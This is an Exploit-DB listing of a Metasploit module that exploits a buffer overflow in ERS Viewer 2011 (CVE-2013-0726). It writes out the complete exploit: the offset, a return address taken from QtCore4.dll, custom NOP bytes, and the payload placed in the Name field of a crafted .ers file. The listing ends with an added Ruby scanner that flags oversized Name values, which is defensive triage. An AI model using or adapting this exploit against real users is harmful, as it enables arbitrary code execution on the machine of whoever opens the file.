ERS Viewer 2011 – ‘.ERS’ File Handling Buffer Overflow (Metasploit)

  • Author: Metasploit
    Date: 2013-05-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/25448/
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking

      include Msf::Exploit::FILEFORMAT

      def initialize(info={})
        super(update_info(info,
          'Name' => "ERS Viewer 2011 ERS File Handling Buffer Overflow",
          'Description'=> %q{
            This module exploits a buffer overflow vulnerability found in ERS Viewer 2011
            (version 11.04). The vulnerability exists in the module ermapper_u.dll where the
            function ERM_convert_to_correct_webpath handles user provided data in an insecure
            way. It results in arbitrary code execution under the context of the user viewing
            a specially crafted .ers file. This module has been tested successfully with ERS
            Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.
          },
          'License'=> MSF_LICENSE,
          'Author' =>
            [
              'Parvez Anwar', # Vulnerability Discovery
              'juan vazquez' # Metasploit
            ],
          'References' =>
            [
              [ 'CVE', '2013-0726' ],
              [ 'OSVDB', '92694' ],
              [ 'BID', '59379' ],
              [ 'URL', 'http://secunia.com/advisories/51725/' ]
            ],
          'Payload'=>
            {
              'Space'=> 7516,
              'BadChars' => "\x22\x5c" +
                (0x7f..0xff).to_a.pack("C*") +
                (0x00..0x08).to_a.pack("C*") +
                (0x0a..0x1f).to_a.pack("C*"),
              'DisableNops' => true,
              'EncoderOptions' =>
                {
                  'BufferRegister' => 'ESP'
                }
            },
          'SaveRegisters'=> [ 'ESP' ],
          'DefaultOptions'=>
            {
              'ExitFunction' => "process",
            },
          'Platform' => 'win',
          'Targets'=>
            [
              [ 'ERS Viewer 2011 (v11.04)/ Windows XP SP3 / Windows 7 SP1',
                {
                  'Offset' => 260,
                  'Ret' => 0x67097d7a # push esp # ret 0x08 from QtCore4.dll
                }
              ],
            ],
          'Privileged' => false,
          'DisclosureDate' => "Apr 23 2013",
          'DefaultTarget'=> 0))

        register_options(
          [
            OptString.new('FILENAME', [ true, 'The file name.','msf.ers']),
          ], self.class)

      end

      # Rewrote it because make_nops is ignoring SaveRegisters
      # and corrupting ESP.
      def make_nops(count)
        return "\x43" * count # 0x43 => inc ebx
      end

      def exploit

        buf = rand_text(target['Offset'])
        buf << [target.ret].pack("V")
        buf << make_nops(8) # In order to keep ESP pointing to the start of the shellcode
        buf << payload.encoded

        ers = %Q|
    DatasetHeader Begin
    Name= "#{buf}"
    DatasetHeader End
    |

        file_create(ers)
      end
    end
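
For triage of inbound .ers files, the following added example (not part of the Metasploit module or of ERS Viewer) flags any Name value long enough to reach the 260-byte offset the module uses. The names scan_ers, NAME_LIMIT and NAME_RE and the sample inputs are constructed for illustration, and treating 260 bytes as the cut-off for legitimate names is an assumption.

```ruby
# Added defensive example; not part of the Metasploit module above.
# Threshold = the module's 'Offset' (260): a Name value at least this long
# reaches the point where the module places its return-address overwrite.
# Assumption: legitimate dataset names stay below this length.
NAME_LIMIT = 260

# Matches `Name = "value` on one line. The closing quote is optional so a
# value with a missing terminator is still measured.
NAME_RE = /^\s*Name\s*=\s*"([^"\r\n]*)/i

# Scan raw .ers bytes; return one finding per oversized Name value.
def scan_ers(data)
  findings = []
  # .b gives a binary copy so invalid UTF-8 in the file cannot raise.
  data.b.each_line.with_index(1) do |line, lineno|
    m = NAME_RE.match(line)
    next unless m
    value = m[1]
    next if value.bytesize < NAME_LIMIT
    findings << {
      line: lineno,
      length: value.bytesize,
      # Bytes outside printable ASCII are a second signal worth reporting.
      non_printable: value.bytes.any? { |b| b < 0x20 || b > 0x7e }
    }
  end
  findings
end

# Constructed sample inputs (not real datasets).
BENIGN_ERS = "DatasetHeader Begin\n\tName = \"C:\\data\\survey_2011.ers\"\nDatasetHeader End\n"
OVERSIZED_ERS = "DatasetHeader Begin\nName= \"#{'A' * 300}\"\nDatasetHeader End\n"

if __FILE__ == $PROGRAM_NAME
  { 'benign' => BENIGN_ERS, 'oversized' => OVERSIZED_ERS }.each do |label, data|
    hits = scan_ers(data)
    puts "#{label}: #{hits.empty? ? 'ok' : hits.inspect}"
  end
end
```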